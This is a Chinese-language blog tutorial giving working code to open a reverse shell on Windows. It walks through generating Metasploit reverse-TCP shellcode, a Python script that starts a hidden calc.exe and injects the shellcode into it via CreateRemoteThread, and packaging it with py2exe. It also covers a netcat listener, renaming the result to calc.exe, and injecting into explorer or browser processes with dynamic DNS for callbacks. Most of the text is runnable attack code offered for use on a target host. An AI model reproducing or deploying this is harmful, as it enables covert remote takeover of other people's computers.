在Python平台通过Dll注入实现简单shell反弹

 
在python平台进行dll远程线程注入,实现一个简单的反弹shell;方法来自互联网!

准备工作:
安装有python的平台,最好是windows(顺便进行测试);安装有py2exe,以便于把python脚本转化为.exe文件。

ok,准备好了就让我们开始:
首先用msfpyload生成一段shellcode:

msfpayload windows/shell_reverse_tcp LHOST=your lhost LPORT=your port C

 
然后新建三个python脚本:inj.py,defines.py 和 setup.py , 内容分别如下:
 [ 将上如图中标记出来的的反弹shell代码替换inj.py中“shell_reverse_tcp_shellcode=(”后面的相应内容;这个脚本中“victim = r"C:\windows\system32\calc.exe"” 是将我们生成的shellcode注入到calc.exe文件,也就是windows自带的计算器程序进程里,可以自己修改,如资源管理器,ie什么的] 

inj.py:

import sys
from ctypes import *
from defines import *

kernel32 = windll.kernel32
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)

victim = r"C:\windows\system32\calc.exe"

startupinfo =STARTUPINFO()
process_information =PROCESS_INFORMATION()
creation_flags =CREATE_NEW_CONSOLE
startupinfo.dwFlags =0x1
startupinfo.wShowWindow =0x0
startupinfo.cb =sizeof(startupinfo)

kernel32.CreateProcessA(victim,
              None,
              None,
              None,
              None,
              creation_flags,
              None,
              None,
              byref(startupinfo),
              byref(process_information))

pid = process_information.dwProcessId

def inject(pid,data,parameter=0):
  h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,int(pid))
  if not h_process:
     raise SystemExit,"[!] Could not acquire a handle to PID : %s"%pid
  arg_address=kernel32.VirtualAllocEx(h_process,
                       0,
                       len(data),
                       VIRTUAL_MEM,
                       PAGE_EXECUTE_READWRITE)
  written = c_int(0)
  kernel32.WriteProcessMemory(h_process,
                   arg_address,
                   data,
                   len(data),
                   byref(written))
  thread_id = c_ulong(0)

  start_address = arg_address

  if not kernel32.CreateRemoteThread(h_process,
                      None,
                      0,
                      start_address,
                      parameter,
                      0,
                      byref(thread_id)):
     raise SystemExit,"[!] Fail to inject Dll . Exit .. "
  return True

#msfpayload windows/shell_reverse_tcp LHOST=x LPORT=y

shell_reverse_tcp_shellcode=(
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x01\x0b\x68\x02\x00\xad\x9c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)
inject(pid,shell_reverse_tcp_shellcode)

currentpid = str(kernel32.GetCurrentProcessId())

#./msfpayload windows/exec CMD="cmd.exe /c taskkill /PID AAAA"

shellcode_kill_proc = \
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" \
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" \
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" \
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" \
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" \
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" \
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" \
"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" \
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b\x69\x6c\x6c" \
"\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00"

padding = 4-(len(currentpid))
replace_value = currentpid + ("\x00" * padding)
replace_string = "\x41"*4
shellcode_kill_proc = shellcode_kill_proc.replace(replace_string,
replace_value)



defines.py:

from ctypes import *

# map the Microsoft types
BYTE = c_ubyte
WORD = c_ushort
DWORD = c_ulong
LPBYTE = POINTER(c_ubyte)
LPTSTR = POINTER(c_char)
HANDLE = c_void_p
PVOID = c_void_p
LPVOID = c_void_p
UINT_PTR = c_ulong
SIZE_T = c_ulong

class STARTUPINFO(Structure):
  _fields_=[
    ("cb",  DWORD),
    ("lpReserved",  LPTSTR),
    ("lpDesktop",   LPTSTR),
    ("lpTitle",   LPTSTR),
    ("dwX",  DWORD),
    ("dwY",  DWORD),
    ("dwXSize",  DWORD),
    ("dwYSize",  DWORD),
    ("dwXcountChars",  DWORD),
    ("dwYcountChars",  DWORD),
    ("dwFillAttribute",  DWORD),
    ("dwFlags", DWORD),
    ("wShowWindow",  WORD),
    ("cbReserved2",  WORD),
    ("lbReserved2",  LPBYTE),
    ("hStdInput",   HANDLE),
    ("hStdOutput",   HANDLE),
    ("hStdError",   HANDLE),
    ]

class PROCESS_INFORMATION(Structure):
    _fields_=[
      ("hProcess",   HANDLE),
      ("hThread",   HANDLE),
      ("dwProcessId",   DWORD),
      ("dwThreadId",   DWORD),
      ]
CREATE_NEW_CONSOLE = 0x00000010


 

setup.py:

from distutils.core import setup

import py2exe

setup(windows=["inj.pyw"],
      options={"py2exe":{"bundle_files":1}},
      zipfile=None,
      )


在本机用nc进行监控:

nc -lvp your port

将以上三个脚本copy至目标主机同一目录,然后执行:

python inj.py

测试是否shell反弹成功:

 

若不成功,慢慢检查吧,如果反弹成功,继续:将 inj.py 修改为 inj.pyw ,然后执行setup.py:

python setup.py py2exe

此时你就会在相同目录下发现一个dist文件夹,里面有一个inj.exe就是我们最终想要的东东,然后重命名inj.exe为calc.exe,测试calc.exe是否会成功反弹:

 

上图反弹成功!试想一下:如果我们将这段反弹shellcode注入资源管理器或者浏览器这种常用且重要的进程里,然后在本机进行端口映射,本机的外网ip地址进行动态域名解析,在上面的shellcode中使用这个域名,再然后用msfconsole监听反弹。。。。

视频教程:


参考:http://www.linux520.com/bcyy/2011-01-08/73.html#ecms

http://hi.baidu.com/fandango/item/e09d55e8197a72e4fb42ba41

来源:xiao106347

评论

© 泪王子 | Powered by LOFTER